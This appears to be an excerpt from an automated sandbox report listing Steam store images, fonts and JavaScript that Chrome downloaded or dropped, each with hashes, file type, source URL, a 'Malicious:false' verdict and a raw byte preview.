        Preview:GIF89aj.\...1.............................................................................................................................................#..#..$..$..$..$..$..%..%..%..%..%..%..&..&..&..'..(..)..*..*..*...#./../../..0..0..0..0..0..0..0&.1..1..3..3#.4$.7".7&.8..8..8..8..8..8..9..9..9#.9#.9).:*.;..<'.<(.?..?..?..?..A".A+.B$.C%.C).D..D+.D0.E..F6.G,.G2.H..J#.J(.J6.K8.L..N,.N9.P4.Q%.Q;.R..S;.T9.TA.V).W-.W-.W2.X%.X8.X?.[:.[C.\D._B._J.a).aC!b..f4.f6.gG.i..iN.iO#k?.lQ&mT+o0.q7.rH.v/.w@.x9.xE.yS%z7.{_,~=.~E..Z(.f1.B..9..>..b..J..P..R..n7.G..C..N..c..c+.vD.F..M..p5.S..y;.Q...J.P..c..W..W...L.a..`..X.._..g..p..k...O.d...X.m...e.z..m....m..o..{..k....{..|.k.S.....o.....................#........{.......0..G..P....d.......$..4..M..j..............!..NETSCAPE2.0.....!.......,....j.\...............................................................................................................................................#..#..$..$..$..$..$..%..%..%..%..%..%..&.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):6141
        Entropy (8bit):7.919155069170763
        Encrypted:false
        SSDEEP:96:aS3ZSjd8/UxWdZPBcEI0e0l4UCXYkPUt8i3uO+67EATsFmvxWua6mDZmB5gn0thS:aS3MGU8PPBcEPeQkXYnujSEIAmvwWHgx
        MD5:C5EA3DCA33CFBC348E80BDA34661FB43
        SHA1:1D89CC714C9D0463A4ED73F3F0435BCF227710EC
        SHA-256:55B2E69DAA4F011FC8A193507DF12A127BC2FCCE5AD145FE51C06913448CEF2C
        SHA-512:BB47F473D664E45366670B761927FBF0347499851FC6DDE6BB2C7C779C2F3B898579864635FE2BCCF6D9C57577B5F153B54711FFC31D52227BA609132237B9B1
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................7...........................!1.A."Qa.2Bq..#....$R..3CS...............................+......................!.1AQ."a.#.2..Rq...............?......t"L.s.._74z.{:.a\..6}9.T.*.yzH..3...d.vN..n..(.h.3.8/.....~....96..x6...*..O.I.Y&.+P.8.G.#Kf..vE......@....x.z'.x.....L.jS.6YC.?/.C.}......X.k.y|.}n..s'.O.@...?H.B..>N.s.y......y.X..V.Yv.1..f.1.*........6J.t....).M......2i.Do5..............v.n'...g..m.qK....,.{....;O.G...%......G.$0..>5.,.8.)5..t<q)E...W~..v..,-...Q.......E7.>...?S..N.")#..37#...4.U.......{.>t..,..&.r..Q.2H{kU.......i....+T7esxS+...WSc.u........g.S...{J......PC,`v..........m..KQ"...4t.0=.I..._n..^/5.<* @...F.V/d[..{bJ....L>fR....>...z*.[v;-.m2..*.c@......M..-._)..ZiYG`.......^.E...=...M.#!..;.=...2....L.. ...}d.O.c.....1.:r.......O...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):43891
        Entropy (8bit):7.955158555503602
        Encrypted:false
        SSDEEP:768:uRF24qNGVIg5S5tfBHi3SIp+BysJfFnxYbFjSUkMR6jMvraH5aWGu1zlLp:ujKNguRHIcysJf8PyUaZfGmzj
        MD5:346387C6D90B53C9F4A036B9D8F1233C
        SHA1:EE44FB9C07C1F77B865FB060608F6685B22AAD10
        SHA-256:2802FEB08CFB4204634A8654D7199EA00500D474DBA23D68F29688DEF5305478
        SHA-512:4AB1FA6ABD55AD9BF136C7110BDC0717272A9FB8EDAB686CE8D9F18C7980452891EA4A61288F3CA1B589C5AA7700D825D0745719E65A3164618BD99CACBF5FF5
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................G.......................!..1AQ.."a.2q.....#BR...3..$4br..5s....CDSc.................................5.......................!1.AQ."aq..2......B..#..R$3b............?....kb...&.....IOZ.jSL...&.D.. .ny...)4.{h.jo...( ....6.B.&.(.V..z..$Pd.|...h.$..Ha.v..LA..a...b..4.f..h....M.d.@p;..LbD*:.R..Ah".R.A.Ham..3.;P.m..`F(...k......!!=.@...i.knh.6....H).3<.,.P..........4..[$..h..,(....'...2CB}8.zCF.I1......'.2X>.(.Y.&...|...d7..\mX1&#.-.)S$.@mJp.$..fLT.......*S....g...f......8 .........F.@...I.=r[.mJ[...l.=.Z(...Ht%.R....t..V.y.....}.7E.Z.N.$.....w...}..D...8..Er.)0j.8..1..B..{.).R!T......M.-I...YM.j"..;...;.......ZTU.V$...iPX.(....09....Ji.t..@..zt+..0....4.L.`......1.....Jf..=-.`..#3.P....U.......+.).'..H.*=.(jZ.4.A)'8.0K}x..2.E...Vh"...tM.i..j.....L...tHcH]..CiT.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 24 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansLight Italic4.015;Plau;M
        Category:downloaded
        Size (bytes):133600
        Entropy (8bit):6.0674472145735345
        Encrypted:false
        SSDEEP:3072:D0000yU00000p4hvCgblYq4AYpbVvQ8U/VMxLseW8Yafj9:D0000GWCClpnYpxvRamfh
        MD5:07247CBD12D4E4160EFD413823D0DEF8
        SHA1:517A80968AA295D0A700A338C22BA41E3A8B78A7
        SHA-256:41464EFD9A32A5967B30ADDC21FE16CD0A35870FDA56658B531A9A2434B4D829
        SHA-512:27E0E7505D41891E70BD06733F96E82E45061D621A1D20BBC524FC89C5406A799CF53D98C0FA256CB4EBFC19750C9A05531A8D273CEBC260D48948EDFFDF6244
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015
        Preview:........... DSIG............GDEF.|.@...,...:GPOS.r....h...dGSUB.e.........POS/2t.........`cmap.......|....cvt Ft..... ....fpgm.6!.........gasp............glyf`..........head...1...0...6hhea.......h...$hmtx.[O".......locap.+........maxp.......@... name.H.....`....post.v.....L....prep...........................................w...x.y...z.3.........&.W.............D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J......................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 291 x 107, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):25286
        Entropy (8bit):7.987583348057773
        Encrypted:false
        SSDEEP:768:oiqlwBKgZDTSqA5UXqJ0gGocupTTgM7YCNPi1GBN:Yl2QDJ0pocwgMLFzX
        MD5:E0B66ABD08331C9AF1034CE915A5E1C7
        SHA1:3010E55C0566A30CB0C71D6A182E09AF7DF3CBC1
        SHA-256:15442D410E832F6D63C620956D87B7C50346FA6B6E6BA233052D2785ECB5212B
        SHA-512:25F553BDA1BD5DDFA028B708260C4B98675FD6F199495374051E74C955C56C80FBFBF2ED40D11E8A136E4AA6C1A3F25895712C03065B539F742C5A031EFE54C3
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...#...k.....<\.....pHYs.................sRGB.........gAMA......a...b[IDATx....\E.>.....m....'...$..A.Q@.WV....w...tf...:?...(....,A..........}.o.k9..n...D.....w..u.o}.;.9u.(.B).B9...k.L....X.%R....B...x.v..(.B)..Hy.............Vo.+tZ...e.[WU.P..P...5.F..T@\)J.9."...o.g.7.x.z..>..bN..kZ.Tto.#...zY...P..oR^3`4i....m..1(..kRT.../..........dv.J.v.....j.."yo$Rk.7....+.B).._^3`4q....9...U......^.I.H.'._...rP....)W.A.}..'.Z..=.$.M.`..J...2...N={h.${"^E%..R......qXB...o.mB...fJ....n{r.9...^....d...8.J........o...U(..T.ac.7.JlSh.Vh1\F..l-.t.R(...0.:...9.=.F....%..#5t.2_.7_dx..F..f.R...."...0.c.P.z...z.{....i.5[...<.....C.M.{.k..}...n;.|.|....v [..........!....J..........XV.!(.B.X.p.4g...D../E..WC...v..R..... .......f..DA..M!...P..~T..)..TO~....n,^..$1.m...........R...V..Q(..[.."J)....Y.5m}.hN...A.W..$..T....L.B).1i..2..V4~.F}.........Q../y.{.a....T.O2._w.%.;;......O.>!\..=#$I. ... ..!...&3.k..u....%.C.u.J....3$.[8...2...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1920x622, components 3
        Category:dropped
        Size (bytes):271346
        Entropy (8bit):7.979118969870086
        Encrypted:false
        SSDEEP:6144:N2+33YecJMlNk7q8i7su1PMFUQJFpTqhnCnbNJ:c+33DDke8xm0FNFJSnCbL
        MD5:C80E2E3AC1EDBEBD75D76CE80E16A40B
        SHA1:114D18FB05D57794EE53C6D1E042E2D207B06423
        SHA-256:F3EE59FD0368874858B582273D4F62679B84C1350A8BFF56A1FB2362007B49C5
        SHA-512:347035291B156AD6CE211CC271348E1B9005C3A55D65FD0A04B2077800488DAD630641671B533C2436B668B0FC09CB3FAA0091B27CD5EFEDA08D203BF2900D56
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C........................................................ "..".......C.......................................................................n.............................................L.........................!1A.."Q2aq..#B.R.....3.$Cbr.S.....4..%c.5Ds.T.d..................................<........................".2!1BR.#AQa.3qb..C..$r...S...4c..............?..;N!*.%X.9....h...&...-....f@t.m.x.!....'.S....H..?2M....\.O....%.............j6r.U#...G<....|*0s..:.....X:..dQ*c!=..P..GI.lJ..iF.}j%.(5./}.`1..W=v....^.9.t3....dm.`.....t.C.O.@.Zk....w....5...H...!...'.X....;...........J.y..s.............:.[.7..k.@?..*.S...*..S@...P...r.=@.E..@.@.......h...Hf.T...#...t.z....Jj.|....<..O...h.t.s...P.....H..7km.;B....MU..h....N....c!.q)..3H..@=..UX'21..........6...%..2..._.&}...9'$.5A.(,p+L.......U..J.wP..P.sL)....I#-....1.v ....NX..q..j..L.../.UT'2....(..VL.......Q.=....#JrMLr4....(.......a.........sS..d.#....t...X..2\8...\S}.t.j....V..zc..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):6085
        Entropy (8bit):7.911655083746525
        Encrypted:false
        SSDEEP:96:ZH9sQF0XRFIDkk09MYaJEjcFXUvUo9CN/wHt1JIuVoJXUMWr/:59s00YkvajUcJwtZoEr/
        MD5:74DDDF95662C80BBA5D98F2FC52EF1B1
        SHA1:627B1AEDB14C1C395D0F8942D67AF85A47B6B5F0
        SHA-256:EF3474B02CECBCEAA93CD6CC5FB8A2E11DF93B3D5D4F5C993F2894705E81F84B
        SHA-512:43D9E3D55CAA9DEF93E3CF981C8E0D1E44C1AFE1F959FD028A8EAD1BC4B890A03603C29EB0444F075E510D5788633B7D593BA2C3CF0056C34624D12211EC6B68
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/2215430/capsule_184x69.jpg?t=1716411566
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................@...........................!1.A."Qa.2q....#$R.....3Bb...6c...................................2........................!1.Q..."2AR.Baq..#3..S..............?..w{\.{..qQK..(..`...I........ ..p.B.$.uw...@.|...s.....IV......\..=..AAI$.v....|. ......g_Q.y...yRCI.{Q...v*&..L..Bx..*1..].7'[.....7.5[...8A..K......d7Uya.l..hZ......"eQI,F....i[...M..qq.[I$_....W.$.n.w.:..I........:.7.}...F..|...{aP......w>.)..M.Y,.9.9.r!.}....!..o..o...5..MBn.5.9Mn.3.....O...j!..,..z....\_.8.....N..~&.............U...s.6..p7.P..H..T.c)....j>Z.b`.H)u'.t......Yc.*pv.....]......r.=.{...6..m.H.j&!N$jp.J.P..........b....s.63&G....)Y....MX.B...:.!....+@(..W..OjJ.tw..._.S_.M......'{...........K..^tJ)......N....bL...,8M..(N.)D.ok.}....JK._m....Z...v...?....@.....)_..}g.1T.......S-.6.a"
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (381), with CRLF line terminators
        Category:downloaded
        Size (bytes):89265
        Entropy (8bit):5.293210754522105
        Encrypted:false
        SSDEEP:1536:qOpYuxcehc6Ac/Erc3h5N/a8axkNM2EVshJQIxrMKvPQfsPsdCkCatn0noz4:3Yjg9MDsooz1
        MD5:843D5EB5F11DA06CF5D519FF829FA5EF
        SHA1:03CB7E4D550D829922AEA7E0A972722F481FDFE2
        SHA-256:2C32183F1689099AF144F01E1C36EF60AFD6D1682831655055E9305C31DE912B
        SHA-512:6F426A0D1F14F248A2DCB8D9B6F3C97E698CFBC144D0AB018D2B014DDF15F08154718F9C76B30A91BE3E19C2AF9F1A8CA8AE125CDC6B18ED18C72534AD755090
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/main.js?v=hD1etfEdoGz1&l=english
        Preview:..function GotFlashPopup()..{...var win = window.open( 'https://store.steampowered.com/gotflash','gotflash','width=536,height=546,resize=yes,scrollbars=yes');...win.focus();..}....//..// Page-able tabs..//..var tabStart = { };..var tabMax = { };..var tabTransition = { };..function PageTab( tab, delta, max, params )..{...if ( tabTransition[tab] )....return;.....if ( !tabStart[tab] )....tabStart[tab] = 0;...if ( !tabMax[tab] )....tabMax[tab] = 0;.....if ( tabStart[tab] + delta >= max )....return;.....tabStart[tab] += delta;...tabTransition[tab] = true;...if ( tabStart[tab] > tabMax[tab] )...{....if ( !params ).....params = {};....params.tab = tab;....params.start = tabStart[tab];....params.count = delta;....new Ajax.Updater(......'tab_' + tab + '_items',......'https://store.steampowered.com/search/tab',......{ parameters: params, method: 'get', insertion: 'bottom', onComplete: TabCompletionClosure( tab, delta, max ) } );....tabMax[tab] = tabStart[tab];...}...else...{....RollTab( tab, del
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 616x353, components 3
        Category:downloaded
        Size (bytes):60437
        Entropy (8bit):7.980043744068461
        Encrypted:false
        SSDEEP:1536:wRec0QtiFeq28GxHp+Ngpy4elcMbW1WMyJKy9DJSZKjEkxWpNBOI:SviFetXp+NN478lBXdSZKjEaWj
        MD5:89D078E4902702716B4F280E115A791F
        SHA1:D47CE618A19D07C8D052909C1BFF96A0FC5C47D1
        SHA-256:E1CDC501A00A2AD31744F6AE894AB824C0B8E4D8FA430E5A479AD57F84F8A978
        SHA-512:47DC942A95105963658799335E728B97AC05142012F09FEBC212F1CCE1A2B21540D09F1851BB53D01EE4BF107E147F6F574E80C66B89FEF63F9D30837789DB23
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/1245620/capsule_616x353.jpg?t=1716311593
        Preview:......JFIF.............C....................................................................C.......................................................................a.h............................................H.........................!.1..AQ"aq..2R..#B...3..br...$4C...5..SsE....................................=.......................!1.AQa.."q..2......B..#b3..R$4r5................?.......n..9......@..7.?............M..&;....Q".s.....7?}......O..zv.....+....H....0.i.......`&[..N.P.?...J..gc...Zv.|^....fO..z,,pf.........?........@....1...............z.....o...7.o.Y.c~f...77.o......@.W.V?..0;.f...].....Vf.?3~.7..o.X...7.@Y...7.@......z@...............c.f...<......y.....vf......&.....afn.z...b.....3s.v..7..o.....;~........b.o...g........7.@.]..1...3{.f.........@..............O1..1.......]......<.#..v3.q....1.f.z._1..3~....G.............?.o...#..o.By.........7.@..?.o....~&....k.s...y......<.............,|..7..6..)...P..hFb..U.O -.......P#1.@...ON........
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 24 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansLight Italic4.015;Plau;M
        Category:downloaded
        Size (bytes):133600
        Entropy (8bit):6.0674472145735345
        Encrypted:false
        SSDEEP:3072:D0000yU00000p4hvCgblYq4AYpbVvQ8U/VMxLseW8Yafj9:D0000GWCClpnYpxvRamfh
        MD5:07247CBD12D4E4160EFD413823D0DEF8
        SHA1:517A80968AA295D0A700A338C22BA41E3A8B78A7
        SHA-256:41464EFD9A32A5967B30ADDC21FE16CD0A35870FDA56658B531A9A2434B4D829
        SHA-512:27E0E7505D41891E70BD06733F96E82E45061D621A1D20BBC524FC89C5406A799CF53D98C0FA256CB4EBFC19750C9A05531A8D273CEBC260D48948EDFFDF6244
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/fonts/MotivaSans-LightItalic.ttf?v=4.015
        Preview:........... DSIG............GDEF.|.@...,...:GPOS.r....h...dGSUB.e.........POS/2t.........`cmap.......|....cvt Ft..... ....fpgm.6!.........gasp............glyf`..........head...1...0...6hhea.......h...$hmtx.[O".......locap.+........maxp.......@... name.H.....`....post.v.....L....prep...........................................w...x.y...z.3.........&.W.............D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J......................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 1 x 1
        Category:downloaded
        Size (bytes):807
        Entropy (8bit):0.4261982118465057
        Encrypted:false
        SSDEEP:3:CUlFE/xlzeze:zFEGze
        MD5:39BC952559E5A8F4E84BA035FB2F7390
        SHA1:4F415467396B4A50149373CA75BCB4C04C2F60B6
        SHA-256:8F73EF54EFC672061F69CA881FE318DCCC6DD67D993CBB8E76E53E52C84EE493
        SHA-512:C7E107E803941A965A173EC8DC7DDFB052C042AB0070E92E5FF47D0E02ECB38446BDC13BBF201D68B2F5696AFBEEA1AF494A65EED4B086EF368CF147892E4409
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/blank.gif
        Preview:GIF89a.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,................;
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:dropped
        Size (bytes):4025
        Entropy (8bit):7.875305304007276
        Encrypted:false
        SSDEEP:96:vWse8fHEpBjJ0qfgezoPs1VxAVSCrpTpr72lNur+qrG:O7SWBje8xM01VKVddp7Eq6
        MD5:23E3FA5AB0EC8BD2017FD6D352613C79
        SHA1:1611C7716920D4E1028C1F4929C8638A28578630
        SHA-256:6FDE6A537942144EA9FF42770241E8904CF978AC14608A56181897A91D5094A2
        SHA-512:B205015B2EF9806475D6A26B10138768BFCBDC7A849698265C8B02F7A50966A90B24789C7EF1021DA8AC9812FB28FD7CE118BA329F775D3E037B398E81C36FA0
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................E..........................!.1Q."Aaq..2rs....#34BR........5$67Cbtu................................-.....................!..1A."2Q.aq..B.................?..D.rM.R.J..k&,.iZ.'pz.q....;..dN.d[../...t(.+...aqn@x..:/..s|.....B.-..1..%N.AD.`z...V.)..'<...Fg...]R...P*i..'P.V .0...:.J....R;._..8..H...a$.WO).......2....^f..JNi....r..v....a.gN....{...#.*........w./.....*._..>.......".S...K..R........0n].r...d....+:..._.w..A.[......V#.j..k...R.:..!#..w...L..$....u9..h-....H..Q7;s;..LU".%:*f>..........T....7...6.....a.......R..u.KQH*V.....I..j.C....7.!.p6...C.U6g4..(C.JIk.$............IYJ...e..2. Y.W:.3.Y....8e..g........$#..E.....#.=..y|6..r...gj.z3..q..........O..U..=.o,[]....t._f...v.. .m......M......{.1v.5I.h_..t..MD.....6.......z.mo,c..(..d>.S..k ....Mqr
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x103, components 3
        Category:downloaded
        Size (bytes):7883
        Entropy (8bit):7.922453309778931
        Encrypted:false
        SSDEEP:192:Gde3qia6A3eReBU7/x/hTQqcZusoo/FvP8oR9AMBl:HgluReBUFgb/FHfd
        MD5:FD8A95AB89D1AA91774411F0650E25A5
        SHA1:7B7BB3A37DC2C24F4030DBAF5ED47B927F7D4979
        SHA-256:2FE96734860E4CC6C597C25CD583B84F5EC400D2614FE5065DB8FE9F4E10DD01
        SHA-512:2A0786F4C93F39D8E6C53284701F03FD2374C370E2D829BACE0720FFF603B0D6FEC2D7995A3B1A39EE92E3A17D8196D06381859FCBA06FFAEF40AB3C2FA28216
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256923250/movie.184x123.jpg?t=1705420839
        Preview:......JFIF.............C....................................................................C.......................................................................g.............................................C..........................!..1A"Qa..q.#2B.........Rb.....$%CDTrs................................0.....................!..1.A."Qa..q.#2B...Rb..............?..e>:./J..._.=O.B...y(..H._..q....Lx..[.....=....g...3...!f(2.6}.y.....j.F.M&.C.....4............@..e.._z......|...\.=.%..b......@7#!T..I.E*.x.....2`...km<C....I*....N....N....#.T..T?.Up...2m.....-..%E...u.>..VI..d.*...r.Dem..o......Q.L...Qe.*....V....X. .B...Y.=...BI.**.~-.G...L.3SA3.....!...[i..&.......alefw.....Sh.%..#.."<..:ayf..T.r...o(.._.Oss.]...He.UB.[....d..V.8.E..mm]v...U....,...}Hm%..d......Y...%6.akY&.TmoK.|U&!e1.~..m.6..;...7.....l.G^5...Il.\......*..o...Q.....1...PA.... ....\c..0m...6M.l.......d..X..7.r/.Y...j/...DZ.XaJSe:..{..db..91. ...n.3Si..E\r........&..(W..fR.!%7#Q..b..i.......)R.!W
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1169
        Entropy (8bit):6.53554947966358
        Encrypted:false
        SSDEEP:24:c1hfvWwh82lYSgTqVPdTT3ZyJ3VNIEGVoF5l5aK7l4ew:CAvnzqdp0J3tj5l5aIQ
        MD5:DDBF5745CFD0932E5E18C0EA271F19E7
        SHA1:D9068EDD91F4C01DDFB794AA395843FEB27493A5
        SHA-256:3735B1058C21031892C59D6B52D5F6ACD0B3FC435F7DC0F0F8B586DF29143624
        SHA-512:6D91A3D3905CD835A2936364FE871F9209924EE85DBFB4E22145018DBD2B7EC604DD9F9F7C07758A3F7FF57C6CD40B0471F15AF151D95A0D9A0A6F39D3FFCCB9
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/icon_platform_win.png?v=3
        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:8CD4B3FDC8C611E793BCB6BD713023CE" xmpMM:InstanceID="xmp.iid:8CD4B3FCC8C611E793BCB6BD713023CE" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EFB48ADB4CB311E3AB3FC1E695F5A0EB" stRef:documentID="xmp.did:EFB48ADC4CB311E3AB3FC1E695F5A0EB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>X..G....IDATx.b...?.5..2P...X...X....8....P. ,..2@|....X.......g@,.....m@.....G.....Hf0. .....h...._@...9...&$.7jD..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (2217), with CRLF line terminators
        Category:downloaded
        Size (bytes):118927
        Entropy (8bit):5.314063463503479
        Encrypted:false
        SSDEEP:3072:1MkHeAhR4TXXWFlY0YJygc5XspmfudjxdOw0FBUZq/Y6:1MkHeAQXXWFlY0Ysgc5XsLOw0FBEq/Y6
        MD5:336EA3C1D13CCA563D3D4381AD070D51
        SHA1:B00CACD2B744BA77EFE5CCFC87ACB2E1CAF46A4F
        SHA-256:2E96AA48C1079155800ABB42F1FEA1A3E43E2705A91E7BE105B875076AD859C6
        SHA-512:956D57A4115AE49B15859500B1880A595B22614015F83C0F118B7B14155C13AAA8A4C8401639A7BB9526AD26F79E119801B430765CA3A727611C08C35DF26FC0
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/javascript/home.js?v=M26jwdE8ylY9&l=english
        Preview:..function OnHomepageException(e)..{...if ( typeof console != 'undefined' && console.log )...{....console.log( 'Exception rendering homepage:', e );....if ( e.stack ).....console.log( e.stack );...}..}....InitializeGPFocusRestoreTimeout();....GHomepage = {...oSettings: {},...oApplicableSettings: {"main_cluster":{"top_sellers":true,"early_access":true,"games_already_in_library":true,"recommended_for_you":true,"prepurchase":true,"games":"always","software":true,"dlc_for_you":true,"dlc":null,"recently_viewed":null,"new_on_steam":null,"popular_new_releases":"always","games_not_in_library":null,"only_current_platform":true,"video":true,"localized":true,"virtual_reality":true,"recommended_by_curators":true,"hidden":null},"new_on_steam":{"top_sellers":null,"early_access":true,"games_already_in_library":true,"recommended_for_you":null,"prepurchase":null,"games":"always","software":true,"dlc_for_you":null,"dlc":null,"recently_viewed":null,"new_on_steam":null,"popular_new_releases":null,"games_n
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 19 x 12, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):161
        Entropy (8bit):5.889732387119839
        Encrypted:false
        SSDEEP:3:yionv//thPlmztjllRl/HRthwkBDsTBZtmmAQGzlkWX0N/khY1RtjhCq/4cL+/XN:6v/lhPoJnDsp1AQIlBE91RtjhCE4cK/9
        MD5:F2DAE37ACAC6B9D5A91CAF1885C2F7D0
        SHA1:5F80FDDE9F702A1D7589BC5FAF88C14066E26C32
        SHA-256:93B1FBE4F6245B62BFD4C8C3347ABE0FE67ED711315E59BFADAEBC9873D8D9B5
        SHA-512:8D7FF7133AB97D81985C50FA8FD93916B42B1CE812AF21BC732DCAE45D59B9154FCC965857235D925C471DB191DFB79C0753C70C7A4D5B0285B908E396216805
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...CIDATx.b...?.....6....@.........6.h..1..A....@....fH.^.g.HO.......#.7.d.].....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x103, components 3
        Category:downloaded
        Size (bytes):3207
        Entropy (8bit):7.823442007788021
        Encrypted:false
        SSDEEP:48:KN3AZfd89cBa7q8/N2+e5D5IPCCNfwq8cQopS/LU53pEVIVwBxrSEZuz93t:KN3AZ2CU7qRECwwR9oog53BAy
        MD5:C0FC769F185E2AC6034995D34E86ADE0
        SHA1:B34AF091C36BB1968CD925C75FBF0CEB9A95B234
        SHA-256:CF6D1155B2FA9E396E370A14664C5FA04261BB3F1979A12DE77C1910D2ED0918
        SHA-512:D247DC0634C85FF7F7C792467EC56DF70824D803F77493D31D587A4B906B2840F77CACBD374096247BE8817FEC9F936C0097C7BDFC1DEEBDA99ED7DDC3EF13DC
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256891964/movie.184x123.jpg?t=1705420854
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................g..............................................9.........................!1A.."Qa..2q......BRS#3C...$D....................................................!1A2Qaq............?...'z.h..&...h..&...h..&...h..&...h..&...h.w......~....M.0......K&n..?qP7|.. ......y....<vn....5z...j....i.u"vR.... .5,...<v>...{..MLk..g....>...8.....~\E.....<'.'....aQ[K1V....S...?....0....`.[.t.j.(...m....oU.n....k..6..+5...P.D...d..N.L.a..N[.fz.v..n.\[.......5.G......^..d{..r ..Wl.....4.o......uM'..?._.:.........I.S..Z.i..2.q~..j3.#..L5 ...*..08.2..4.K?$...j)Px.l=j.X...'..0A....0.....*..v=jc].a.D.mZb.].........ef:......(f.g`...5|}E.e...Y...]L...4iF.u....`.....x.~./.G)....../]..[R2..&.0.J.w........1K...<R.{.-.!.^..R.N.."7.k...Gh._1{.k...%.B..~`....Z..-.R..).T......YDD...h.y.XaH.aX.+^"v.LD@`?..r..~.V..j.PM..f.ME
